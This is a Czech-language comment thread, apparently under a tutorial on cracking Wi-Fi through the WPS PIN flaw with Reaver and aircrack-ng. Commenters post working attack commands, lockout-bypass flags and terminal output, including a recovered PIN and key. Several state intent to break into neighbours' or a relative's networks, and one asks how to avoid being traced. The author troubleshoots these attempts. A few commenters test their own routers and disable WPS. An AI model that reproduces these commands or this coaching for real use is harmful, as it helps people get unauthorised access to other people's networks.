Nezoufejte, pokud už jste dospěli do bodu, kdy znáte pin wps, už jste prakticky za vodou, přidejte do reaveru -p (celé heslo) a zkuste ještě tak 2krát znovu, woala. :)
7. 6. 2013 11:34:07, Razoz
Ahoj Vitto
Já jsem se také prokousal bránícím se routerem za 3 dny a jak píšeš routr mi začal chrlit nesmyslné kody.
použil jsem pro zjištění hesla:
reaver -i mon0 -c 1 -b C8:3A:35:11:7B:C8 -p 11458005


Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from C8:3A:35:11:7B:C8
[+] Associated with C8:3A:35:11:7B:C8 (ESSID: AdamTerka)
[+] WPS PIN: '11458005'
[+] WPA PSK: '0109f0ede38bb091fd4aacb9ffcb38e992fad2a366430f5126f79e81f4def280'
[+] AP SSID: 'AdamTerka'

i několikrat po sobě ale heslo pokažde jine a nesmyslné, co mám přesně použit abych s toho vydoloval heslo, dík za odpověd.
22. 6. 2013 21:04:05, FANTOMAS
AHOJ
TVŮJ NÁVOD JE HODNĚ DOBREJ. JÁ ÚPLNÝ LAIK SEM TO DOKÁZAL PROLOMIT, ALE CHTĚL JSEM SE ZEPTAT, JESLI TO TEN DOTYČNÝ (oběť) NĚJAK POZNÁ. JÁ JSEM POSTŘEHL ŽE SI ZMĚNIL IP ADRESU I TAK VŠE V POHO. POUŽÍVÁM BACKTRACK JAKO SVŮJ SYSTÉM. JSOU NĚJAKÉ PROGRAMY NA MASKOVÁNÍ APOD. A CHTĚL BYCH VĚDĚT JESTLI MĚ MOHOU NĚJAKÝM ZPŮSOBEM VYSTOPOVAT. DÍK ZA ODPOVĚĎ
----------------JSI MACHR
22. 6. 2013 21:29:59, FANTOMAS
JO A TAKÉ JEDNU DOBU SE NENAČÍTALY STRÁNKY TAK JAK MAJÍ ALE MÍSTO TOHO TEĎ PŘESNĚ NEVÍM HLÁŠKA PRO POKRAČOVÁNÍ KLIKNĚTE ZDE, TAK JSEM KLIKNUL ZE ZVĚDAVOSTI A TAM BYLO JEN ŽE ------ VAŠE IP ADRESA JE ...........
NEDÁVNO JAK SI ZMĚNIL IP ADRESU, JAK PÍŠI NAHOŘE TAK VŠE V POHOAĎE I TAK BYCH RÁD VĚDĚL VÍC

DIK ZA ODPOVĚĎ
26. 6. 2013 12:24:45, mrpear
[FANTOMAS] Dotyčný to samozřejmě může poznat, nicméně většinou nepozná to, že se mu někdo pokouší / pokusil prolomit do sítě přes slabinu WPS, ale poté může vidět ve výpisu připojených zařízeních někoho, koho nezná. Ale většina lidí ani neví, že se dají takové věci zkontrolovat a vůbec se do nastavení a statistik routeru nedívají...
30. 6. 2013 19:41:47, FANTOMAS
AHOJ MÁM PROBLÉM:
JSEM UŽ NA cca 50 PROCENTECH - VŠE JELO V POHO A NAJEDNOU SE MI UKAZUJE TOTO:
JAK TO MÁM VYŘEŠIT PROSÍM..... POUŽIL JSEM PŘÍKAZ

root@bt:~# reaver -i mon0 -vv -a -b 54:XX:XX:XX:XX:00 --no-nacks -d 5

A K TOMU

root@bt:~# aireplay-ng mon0 -1 120 -a 54:XX:XX:XX:XX:00 -e xxxxxxx


DĚKUJI ZA RADY.....................................

[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 55455671
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
11. 7. 2013 12:32:25, Matla
Dobrý den,

když zadám hned první příkaz v grafickém prostředí (airmon-ng start wlan0) tak mi to vypíše tři sloupečky Interface, Chipset a Driver, ale nic víc. Jen tyto tři slova. A u obrázku nahoře jsem si všiml že to co je napsané pře příkazem je "root@bt:/#" kdežto já tam mám "root@bt:~#". Chci se proto zeptat jestli je to nepodporovanou wifi kartou. Děkuju
13. 7. 2013 11:41:16, Matla
edit - příkaz je samozřejmě airmon-ng strat wlan0
14. 7. 2013 9:56:12, mrpear
[Matla] Vypadá to, že systém nevidí žádnou wifi kartu. Tzn. buď opravdu žádná není nebo není kompatibilní.
17. 7. 2013 21:35:42, Matla
Mám wifi kartu která na Windowsech jede bez problémů. Jedná se o "Intel Centrino Wireless-N 135". Také jsem zkoušel - a teď mne nemějte za blba, jen si nevzpomenu - dát tam anténu přes USB a de přes to chytat wifi. Driver nainstalovaný, na Windowsech opět funguje.
17. 7. 2013 22:13:15, mrpear
[Matla] Vůbec netuším, co jsi chtěl posledním komentářem říct.
21. 7. 2013 21:33:52, Matla
To je jedno, už se k tomu nebudu vracet, sám to zpětně nechápu... Jen se ještě chci zeptat - když koupím nějakou USB wifi kartu, a připojím ji (podporovanou programem airmon (nemýlim-li se)) mělo by to jet?
21. 7. 2013 21:37:26, mrpear
[Matla] Jasně ;).
25. 7. 2013 21:27:24, FANTOMAS
AHOJ ZAJÍMALO BY MĚ JAK VYŘEŠIT TUHLE CHYBU


!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred

PŘELOŽIL JSEM GOOGLEM PŘÍKAZ REAVER S PARAMETRY , TAK ZKOUŠEJTE A DEJTE VĚDĚT - JÁ BUDU TAKY ZKOUŠET A JINAK DÍKY ZA RADY


Obvykle se použije pouze argumenty Reaver je název rozhraní a BSSID cílového AP:

# Reaver-i mon0-b 00:01:02:03:04:05

Kanál a SSID (za předpokladu, že SSID není halí) cílového AP bude automaticky identifikovány Reaver, pokud to není výslovně uvedeno na příkazovém řádku:

# Reaver-i mon0-b 00:01:02:03:04:05-c 11-e Linksys

Ve výchozím nastavení, pokud je AP přepíná kanály, budeme Reaver také změnit svůj kanál odpovídajícím způsobem. To však může být tato funkce vypnuta, kterým rozhraní v kanálu:

# Reaver-i mon0-b 00:01:02:03:04:05 - opraveno

Výchozí obdrží časový limit je 5 sekund. Tento časový limit lze nastavit ručně v případě potřeby (minimální časový limit je 1 sekunda):

# Reaver-i mon0-b 00:01:02:03:04:05-t 2

Implicitní doba mezi pokusy pin je 1 sekunda. Tato hodnota může být zvýšena nebo snížena na jakékoli nezáporné celé číslo. Hodnota nula znamená bez zpoždění:

# Reaver-i mon0-b 00:01:02:03:04:05-d 0

Některé AP dočasně zamknout WPS stav, obvykle po dobu pěti minut nebo méně, pokud je detekován "podezřelé" aktivity. Ve výchozím nastavení, když je detekován uzamčeném stavu bude Reaver kontrolu stavu každých 315 sekund (5 minut a 15 sekund), a ne pokračovat hrubou nutí kolíky do WPS stát se odemkne. Tato kontrola může být zvýšena nebo snížena na jakékoli nezáporné celé číslo:

# Reaver-i mon0-b 00:01:02:03:04:05 - lock-delay = 250

Další výstup, může být možnost podrobného být. Poskytování možnost podrobného dvakrát zvýší výřečnost a...
25. 7. 2013 21:30:08, FANTOMAS
http://code.google.com/p/reaver-wps/wiki/README
27. 7. 2013 18:32:51, Freeman
Zdarec, znám pin u svého routeru ale wpa2 pin nesedí, co s tím. Děkuji za článek a radu. Jen tak dál ;)
31. 7. 2013 14:00:28, mrpear
[Freeman] Něco je asi špatně. Co je myšleno "wpa2 pin"? WPA2 Heslo? Ale těžko tahle poradit, příliš obecná otázka.
18. 8. 2013 12:40:44, storm
Mam stejny pdoblem jako Jarda, hned na zacatku mi to nahlasi 1 problem ktery zastavi proces airmon-ng a to PID 2479 Name dhclient3 a potom Interface Chipset Drivebedalsihvypisu.Ipconfig nic neukaze. Mam to chapat tak ze moji wifinu tio nepodporuje?? Jedu na ntb Asus K55V se standartni wifinou
2. 9. 2013 20:58:11, Firestone
Zdravíčko,

nezkoušel si někdo hrát s Xiaopan? Je celkem maličký, vejde se i na USB klíčenku/malé CD a obsahuje téměř všechny potřebné nástroje.

A co takhle nějaké zkušenosti s PIN rate limitem? Neobjevili se nějaké nové zkušenosti/poznatky?
4. 9. 2013 14:44:59, mrpear
[Firestone] Asi ten Xiaopan zkusím ;).
8. 9. 2013 23:23:11, Drake
Zdravim mam hacknuty PIN pres Inflator (reaver 1.4)
nicmene wpa klic je velice dlouhy a pokazde kdyz zadam pin se znovu zmeni.
jak se resi tato varianta menicicho se wpa psk kodu... diky
10. 9. 2013 17:46:01, Mára
Dobrý den chtěl bych se zeptat jak spustit B-T 3r v ms virtual studio 2007 vše se nabootuje ale vždy na té "ploše" nejde nic dělat. :) Zkoušel jsem všechny přikazy (startx atd...) ale pořád nic :) prosím poraďte.
28. 9. 2013 15:47:04, Karel
Dobrý den.
Mám stejný problém jako RAZOS ze 7.6. 2013 a DRAKE ze 8.9.2013.
Zkoušel jsem to aspoň 20x za sebou stále jiné a nesmyslně dlouhé wpa psk
Díky
4. 10. 2013 8:47:15, storm
jen samo reakce na můj dotaz ze srpna...moji wifinu to skutečně nepodporovalo ale když jsem zkusil jinej book tak to šlapalo...nicméně všechny routery dokola jsou hodně dobře zabezpečný kromě jednoho, ale tam mám příliš slabý signál...takže jsem to vzdal. Ještě dotaz pro všechny...když už jsem připojenej do sítě přes centrání apčko tady v domě tak lze nějak hacknout routery metalickou cestou???
4. 10. 2013 9:31:28, mrpear
[storm] Hacknout router po metalice samozřejmě jde, jde o to zjistit login a pak si s ním dělat co chceš.

Nicméně tak jak jde "cokoliv hacknout", lze také "cokoliv celkem dobře proti hacknutí zabezpečit", takže předpokládám, že provider bude mít svoje routery zabezpečené (protože na rozdíl od "běžných uživatelů" většinou ví, co dělá...).
6. 10. 2013 20:12:25, Bedy
Mám možná blbej dotaz, ale když budu bootovat z DVD, přijdu o Vokna anebo ne? Nebo když vyndám prostě DVD z mechaniky, pojedou Windows jako vždycky?
6. 10. 2013 20:25:41, mrpear
[Bedy] Nepřijdeš. Všechno pak pojede jako dřív.
7. 10. 2013 18:14:49, Bedy
[mrpear] Ok. Díky! Skvěle napsanej článek, jen tak dál.
7. 11. 2013 15:34:21, Pivo
Bomba! Jdu to hned vyzkoušet, zkusím jak mám odolný router a pak to vyzkouším na sousedech. Jestli půjde můj hacknount a jejich né, budu asi hodně naštvaný!
13. 11. 2013 22:02:03, Mona
Zdravím.Skúšam svoju wifi,a/som úplny amat.v pc/po príkaze reaver -i mon0 - XX:XX:XX:XX:XX:XX -vv mi napíše waiting for beacon from XX:XX::XX atď a kurzor len bliká v nasl.riadku---ako ďalej???ak sa dá prosím o radu.
13. 12. 2013 13:59:56, Tomas
Hezky den. Mám jeden dotaz. Jsem úplný amatér a potřeboval bych se napojit na WIFI svého bratra se kterým se momentálně nabavím a tak je mi trapné se ho ptát na heslo k WIFI. Znám všechny údaje ze spodní části jeho roteru včetně PIN. Potřeboval bych tedy pouze heslo k WIFI. Prosím o co nejjednodušší radu jak toho dosáhnout. Díky moc.
13. 12. 2013 21:24:49, mrpear
[Tomas] Postup je popsán v článku, stačí se podívat na úplný závěr.
3. 1. 2014 19:21:27, Drobcek
diky autorovi za super clanok,
len dodam ze kopec chybnych hlaseny je sposobene slabym signalom ,kde odporucam minimalne 65% signalu !
5. 1. 2014 20:13:11, Xyron
je možný že linux nepodporuje mojí síťovou kartu v notebooku nebo dělám v něčem chybu já, když napíšu příkaz airmon-ng start wlan0 tak nefunguje a když jen airmon-ng tak se žádná karta nevypíše. Dá se stím něco dělat? Linux jsem viděl poprvé v životě tak se v tom vůbec neorientuju. Ve windows prostě nainstaluju ovladače a pak už všechno funguje.
6. 1. 2014 13:12:41, mrpear
[Xyron] Jo, je to možné. Zkusil bych to na jiném stroji nebo např. s USB wifi kartou...
25. 1. 2014 11:39:29, Anonymous:D
Tak attack jede ;D takže WPS je asi zaplé co ? ;D
30. 1. 2014 13:10:46, Anonymhack
Díky,wifi prolomena za 8 hodin:-) super návod Mágu:-)
5. 2. 2014 2:01:49, goofi
ahoj mam problem stim ze kdyz zadam prikaz airodump-ng tak ni nenabehne CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR
00:14:6C:7A:41:81 34 100 57 14 1 9 11e WEP WEP bigbear
00:14:6C:7E:40:80 32 100 752 73 2 9 54 WPA TKIP PSK teddy

BSSID STATION PWR Rate Lost Packets Probes

00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 36-24 2 14
(not associated) 00:14:A4:3F:8D:13 19 0-0 0 4 mossy
00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 36-36 0 5
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 54-54 0 99 teddy


ale zobra zi se jen ................


Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix
-w : same as --write
--beacons : Record all beacons in dump file
--update <secs> : Display update delay in seconds
--showack : Prints ack/cts/rts statistics
-h : Hides known stations for --showack
-f <msecs> : Time in ms between hopping channels
--berlin <secs> : Time before removing the AP/client
from the screen when no more packets
are received (Default: 120 seconds)
-r <file> : Read packets from th...
9. 2. 2014 18:03:42, liod
Je možné ten program spustit i ve virtuálním prostředí Linuxu? Bez skutečné instalace Linuxu? Pro MS Windows asi verze není že?
9. 2. 2014 18:26:57, mrpear
[liod] Virtuál není vůbec potřeba, BackTrack je live distribuce, takže se vypálí na DVD, nabootuje z DVD, provede útok, DVD se vyjme z mechaniky a to je vše. Běžně instalovaný systém to vůbec neovlivní.
22. 2. 2014 9:04:44, wydlaak
Návod tak špičkovej, že je mi líto že jsem na to nenarazil dřív. Tak to chci zkusit, ale místo Back Track mi to nabízí Kali Linux. Je to totožný program včetně použití, nebo mám hledat jinde? Díky!
23. 2. 2014 18:14:13, strapal
Bomba web, bomba clanek. ALE! Pokud nekdo pise ze je uplny amater, tak nema pravdu. Ja jsem uplny amater. :-) Tak zacnu. Potrebuju doporucit nejakou wifi kartu. Tuto jsem kupoval kvuli CommViewu ale podle vseho funguje pouze na win.
http://cz.tp-link.com/products/details/?categoryid=&model=TL-WN822N
23. 2. 2014 19:03:25, kuzmo
Chcem vedieť či sa dá sieť prelomiť ak po zadaní kódu Wash -i mon0 mi napíše WPS version 1.0 a WPS locked YES ....
24. 2. 2014 8:10:09, mrpear
[kuzmo] WPS locked YES znamená, že je WPS uzamčeno, tzn. předpokládám, že útok nebude možný.
25. 2. 2014 18:55:02, strapal
Po prikazu "dmesg" mimo jine vypsal:

[ 95.673406] usbcore: registered new interface driver carl9170
[ 96.050258] Registered led device: carl9170-phy1::tx
[ 96.050437] usb 2-5: Atheros AR9170 is registered as 'phy1'

Zname to, ze BT ma ovladac a poznal chipset adapteru pripojeneho na USB? Jak ale prepnu interni wifi adapter na tento abych mohl pokracovat?
26. 2. 2014 8:50:37, mrpear
[strapal] Tak hlasí se jako phy1, takže místo wlan0 bych použil phy1.
26. 2. 2014 10:34:10, strapal
To ja bych rad, ale nevim jak.
26. 2. 2014 22:31:16, strapal
Vypis z BT5 R3 Black Hat

root@bt:~# airmon-ng
Interface Chipset Driver

wlan1 WPS Button
Atheros AR9170 carl9170 - [phy1]
wlan0 Broadcom b43 - [phy0]

root@bt:~# airmon-ng start phy1
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
2429 dhclient3
2619 dhclient3
Process with PID 2619 (dhclient3) is running on interface wlan0

Jak postupovat dale?
5. 3. 2014 15:29:32, Honza
no výborně, u mýho routeru byl PIN zjištěn za 20 sekund po vyzkoušení asi 5ti pokusů! vypsal mi i moje supr bezpečný heslo pro WPA2 ... jdu okamžitě WPS na routeru zakázat! díky za dobrej článek.
6. 3. 2014 19:51:04, strapal
Narazil jsem na problem, ktery popisuje Fantomas - zablokovani routeru na 315 sec a v mem pripade i jeho naproste zhrouceni, resitelne jen odpojenim napajeni. Takze tomu predejdu prodlouzenim zpozdeni -

# Reaver-i mon0-b 00:01:02:03:04:05 - lock-delay = 250

Zpozdeni zamknuti je ale zadouci v radu hodin a ne minut.. Zkousel nekdo?
7. 3. 2014 16:23:43, MACADR
Po ruznych potizich napr.:

[!] WARNING: Receive timeout occurred
[!] WARNING: Failed to associate with...

Po studii diskuze prosel nasledujici syntax jako nuz maslem:

reaver -i mon0 -b 00:11:22:33:44:55 -v --ignore-locks --no-nacks

Vygenerovany jednoduchy PIN 02402789 zdolan za 37min. Taky jsem zjistil pri testu na vlastnim routeru, ze router uplne zamrznul kdyz byl spusten reaver a zaroven na nem byli pripojeni dalsi dva lide hrajici online hry. Zrejme toho bylo na neho mnoho, ale to se da vycist predem z airodump-ng si jako laik myslim. Ale kde je hranice nevim.
11. 3. 2014 10:45:25, Olga Čada
Ahojky,

děkuju moc za super napsaný postup. I lajk jako já to zvládne. Podařilo se mi to tedy až na 4 vybraný pokus. Heslo mi to jak na WPS tak WPA vygenerovalo, ale bohužel, když ho zadám internet se mi nepřipojí. Nevím, zda nemá router omezení, jiný důvod mě nenapadá:(
16. 3. 2014 15:44:24, Libor
Píšeš že aktuální verzi je možno stáhnout vždy na stránce BackTrack Linux — downloads. To už tam ale není. Je tam psáno: BackTrack 5 is OUTDATED and no longer supported – Downloads have been discontinued.
Je to možno ještě někde stáhnout?
Dík!
16. 3. 2014 18:24:37, mrpear
[Libor] Nástupce BackTrack je Kali linux...
27. 3. 2014 20:41:53, Smrečok
Skusal niekto miesto BackTrack pouzit na zistenie hesla WPA2 nieco ine?Napr. odchytit pakety cez program CommView for Wifi. A nasledne heslo lamat cez graficku kartu s pouzitim programu Elcomsoft Wireless Security Auditor, ci programu Ivan Golubev's Password Recovery Suite.
Tu je link na jednu stranku aj s navodom:-)
http://rumyittips.com/how-to-crack-a-wpa2-psk-password-with-windows/
30. 3. 2014 10:18:37, Libor
Proc ten posledni pin neni schopen zjistit? Stale se to opakuje.

WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2014-03-30 09:08:44 (1 seconds/pin)
[+] Max time remaining at this rate: 0:00:01 (1 pins left to try)
31. 3. 2014 20:43:44, David
Taky se mi to stalo. Zjistil 99.99% a poslední pin nemohl ověřit.
Mám ješte jednu otázku - co dělat se screen saver u Kali Linux? Když nechám běžet reaver po delší dobu tak se spustí automaticky screensaver a já se pak nemůžu zpátky dostat na plochu protože po mě vyžaduje heslo! Nic jsem nenastavoval.Děkuji předem za radu :-)
31. 3. 2014 20:47:59, mrpear
[David] Výchozí heslo u Kali je toor, tedy root pozpátku ;).
31. 3. 2014 21:17:14, David
Dík! Jak jsi to zjistil to heslo? :-)))
A co říkáš co píše Libor? Zkoušel jsem to třikrát a pořád to samé. Ten poslední pin nezjistil a zůstal na 99% zjistění kodu a pak pořád dokola se snažil zjistit ten poslední:
WPS transaction failed (code: 0x03), re-trying last pin
[+] 99.99% complete @ 2014-02-22 15:11:23 (1 seconds/pin)
[+] Max time remaining at this rate: 0:00:01 (1 pins left to try)
1. 4. 2014 8:19:49, mrpear
[David] Zkusil bych pustit reaver s parametrem --no-nacks.
1. 4. 2014 10:04:53, David
V jakem prosim te formatu? Muzes uvest priklad?
1. 4. 2014 10:08:14, mrpear
[David] Jako sorry ale trošku snahy by neuškodilo, takže si na to zkus přijít za domácí úkol...
1. 4. 2014 10:30:31, Anonymous
Ještě že sem si nechal backtrack na CD:)))
1. 4. 2014 10:34:08, David
:-)))) no ja jenom ze jsem pouzil tento format a asi je spatne :-)

reaver -i mon0 -b 00:11:22:33:44:55 -v --ignore-locks --no-nacks
1. 4. 2014 10:39:57, David
:-)))) no ja jenom ze jsem pouzil tento format a asi je spatne :-) Nefungovalo to.

reaver -i mon0 -b 00:11:22:33:44:55 -v --ignore-locks --no-nacks
2. 4. 2014 15:38:19, liod
Mám stejný dotaz. Když mi doběhl reaver na 99.99% zasekl se a začal opakovat pin - je tedy můj router chráněný proti napadení? WPS nejde vypnout. Předem děkuji za odpověď
13. 4. 2014 20:07:42, Mirek
Metoda je to perfektní.Ale při laborování s Kali Linuxem jsem NĚCO ??? zmáčknul a při zadání airmonu se mi vypíše,že nelze s wifinou/Alfa/hakovat.Nepomohl ani restart.Na jiném PC chodí vše O.K.Prosím poraďte co jsem zvoral./Ntb HP Elitebook+Alfa AWU S036Hev.Air Live WL1700 /
13. 4. 2014 20:13:45, mrpear
[Mirek] Na to se nedá odpovědět... Když už nic tak čistá instalace/live boot Kali...
13. 4. 2014 20:41:26, Mirek
Používám Kali Live z CD.Právě to hlava nebere
13. 4. 2014 20:52:53, Mirek
A ještě jsem zjistil,že po zadání ifconfig se vypíše pouze síťovka a wifiny ne
21. 4. 2014 12:40:41, opička
Díky za článek, vyzkoušel jsem to doma i u souseda a máme lepší pocit ze zabezpečenější sítě. U mě byl default pin 12345678, prima po hodině mi to vypsalo heslo....... soused na tom byl lépe, vydržel 6 hodin :-) Přivítám víc takových článků, vědomostí není nikdy dost ..... Díky.
24. 4. 2014 22:21:44, Mike
Autorovi: nepřipada ti zvracene napichovat pripojeni treba soussedu s wpa2-tkip nejakymi kreteny, kteri mozna neco umi ale neplati zato ani korunu? Ja taty jednoho mam ale nez pude do basy tak jsem si koupil delsi sitovy kabel a wifi vypnul a ma smulu.
26. 5. 2014 10:33:27, max
Mike: A co ti brání v tom, aby sis zabezpečil wifinu, kreténe? Autor jasně napsal, že článek je psán kvůli tomu, aby si lidi otestovali svoje zabezpečení. Jestli si myslíš, že ti pomůže vypnout wifi a jet přes kabel, tak jsi na omylu, okrádat tě můžou stejně.
30. 5. 2014 18:05:47, Pale
takže vypisalo mi toto:

aireplay-ng mon0 -1 120 -a XX:XX:XX:XX:XX:XX -e xxxxxx
No source MAC (-h) specified. Using the device MAC (xx:xx:xx:xx:xx:xx)
17:45:15 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel -1
17:45:15 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

potom som skusil toto:

aireplay-ng mon0 -1 120 -a xx:xx:xx:xx:xx:xx -e xxxxxx --ignore-negative-one


potom hodilo tento vypis:
No source MAC (-h) specified. Using the device MAC (xx:xx:xx:xx:xx:xx)
17:45:53 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel -1

17:45:53 Sending Authentication Request (Open System) [ACK]
17:45:53 Authentication successful
17:45:53 Sending Association Request [ACK]
17:45:53 Got a deauthentication packet! (Waiting 3 seconds)

17:45:56 Sending Authentication Request (Open System) [ACK]
17:45:56 Authentication successful
17:45:56 Sending Association Request [ACK]
17:45:56 Got a deauthentication packet! (Waiting 5 seconds)

17:46:01 Sending Authentication Request (Open System) [ACK]
17:46:01 Authentication successful
17:46:01 Sending Association Request [ACK]
17:46:01 Got a deauthentication packet! (Waiting 7 seconds)

17:46:08 Sending Authentication Request (Open System) [ACK]
17:46:08 Authentication successful
17:46:08 Sending Association Request [ACK]
17:46:08 Got a deauthentication packet! (Waiting 9 seconds)

17:46:17 Sending Authentication Request (Open System) [ACK]
17:46:17 Authentication successful
17:46:17 Sending Association Request [ACK]
17:46:17 Got a deauthentication packet! (Waiting 11 seconds)




takže TO fičí ? diky
3. 6. 2014 11:37:16, kosta
Čau lidi našel jsem v okolí wifi, která je součástí 3D TV LG má wpa2-psk a spuštěné wps, po různých peripetiích jsem vydoloval PIN, ale heslo mi to neukázalo. Tak nevím, jestli jde o nový druh ochrany. Má s tím někdo zkušenost?
6. 6. 2014 14:39:33, mrpear
[kosta] Útočit na tenhle typ wifi nemá cenu, protože se jedná o wiwi v televizi a to je pouze přístupový bod pro spojení televize s domácí wifi přes wifi-direct. Takže i kdyby ses tam vlámal, mohl bys akorát sousedovi pustit nějaký naučný film z vlastní sbírky ;). Na internet se přes tuhle wifi podle mě nedostaneš.
6. 6. 2014 19:08:48, kosta
(mrpear) Dík za reakci, bylo to jediné wps na kterém jsem mohl otestovat návod.
26. 6. 2014 15:37:12, cthulhus
Ahoj.Vedel by si mi poradiť prečo môj BlackBerry Q10 zhodí každú Wifi ktorá nie je verejná?Keď sa len pripojí je to ešte OK ale akonáhle začnem niečo sťahovať po chvíli ju zhodí.Pri otvorených Wifi problém nie je.
27. 6. 2014 14:43:38, mrpear
[cthulhus] S BB nemám bohužel žádné zkušenosti, navíc je to typ dotazu, na který se dá těžko konkrétně odpovědět (pokud to není běžná chyba daného zařízení).
9. 7. 2014 10:11:59, Ventero
Už se rodí ten článek o útoku přímo na WPA ? :-)
28. 7. 2014 15:14:12, mrpear
[Ventero] Jasně ;).
15. 8. 2014 10:33:16, DeeJay Snoopy77
Ahoj mrpear Prosim ta mám na teba otázku skušal som to cez program xiaopan,podla tohto videonávodu https://www.youtube.com/watch?v=CsSnKZQeGiA
lenže moj problém spočíva vtom že xiaopan nevidí moju wifi kartu v notebooku takže to neviem otestovat mohol by mi niekto poradit?Vopred Dakujem za pomoc.
15. 8. 2014 15:02:12, mrpear
[DeeJay Snoopy77] Už se tady na to někdo ptal - nejjednodušší je sehnat kartu, kterou daná distribuce podporuje, ale konkrétní model po mě nechtěj. Viz komentáře výše.
27. 8. 2014 10:46:39, besttracker
DeeJay Snoopy77 -zisti si aky ma tvoja wifi karta chipset,niekedy staci len zmenit ovladace...odporucam pouzivat wifi karty co su uz overene,trebars ked das do googla,,co umi vase wifi karta,,su tam nejake otestovane..xiaopan nie je program ale OS,ktory sluzi primarne na hack wifi chinania to davaju ku kazdej wifi karte...ja som spokojny s Alfa awus036h,kupis ju za 20 eur a je to do usb-cka
7. 9. 2014 21:22:14, Dany
Chtěl bych se zeptat jáký příkaz mám zadat když chci SSID napsat ručne (cez airodump-ng mi to trvá strašne dlouho)
22. 9. 2014 4:27:30, Roman
Zdravím, dříve když byl Kali 1.0.6 tak jsem ho používal v Live režimu a vše fungovalo, ale potom jsem moji (8 GB) Flash-ku zformatoval a o Kali jsem přišel. Teď mám problem že když stáhnu Kali 1.0.9 (Nejnovjejší k datu 22.9)Nevím co s tím. K používaní Linuxu na Flash disku používám Lily USB Linux Creator (Pokusně jsem zkusil nějaky Yppy nebo tak nějak,,už to nemám v hlavě) ten také nefungoval posunul mě maximalně že proběhl příkazový řádek jak nabíhal linux a pak k mému udivu naskocíla plocha windows která byla naposledy před restartovaní vidět na screenu (to už vůůůbec nechápu a to nejsem takovej lajk ajťak :-D), nevím už co s Tím má někdo zkušenost. moje fleshka s tim nikdy probleem neměla, už jsem z ní opakovaně instaloval i jiné systemy ale toto je zrada. potřebuji to vyřešit prosím pomozte mě.
P.S bude Aircrack fungovat na kartach do notebooku:
1. Intel wireless pro 2200BG (Ta je napsana že ano ale údaj packet injection se mění někde ano a někde ne).
2.Atheros AR5BMB5 miniPCI (O té jsem nic nenašel)
Děkuji Roman K.

P.S 2 mrpear-e članek je vynikajicí děkuji za něj moc.

Komentáře jsou uzavřeny